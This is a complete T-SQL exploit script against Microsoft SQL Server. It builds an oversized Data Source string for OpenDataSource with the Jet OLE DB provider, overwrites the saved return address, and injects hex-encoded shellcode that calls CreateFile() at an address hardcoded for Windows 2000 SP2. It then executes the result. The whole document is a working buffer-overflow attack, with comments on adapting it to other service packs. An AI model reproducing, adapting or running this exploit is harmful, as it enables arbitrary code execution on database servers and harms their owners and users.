declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)
select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141
while @cnt < 1063
begin
select @padding = @padding + @pad
select @cnt = @cnt + 1
end
-- overwrite the saved return address
select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747
-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2
-- change if running a different service pack
select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions'
exec (@exploit)
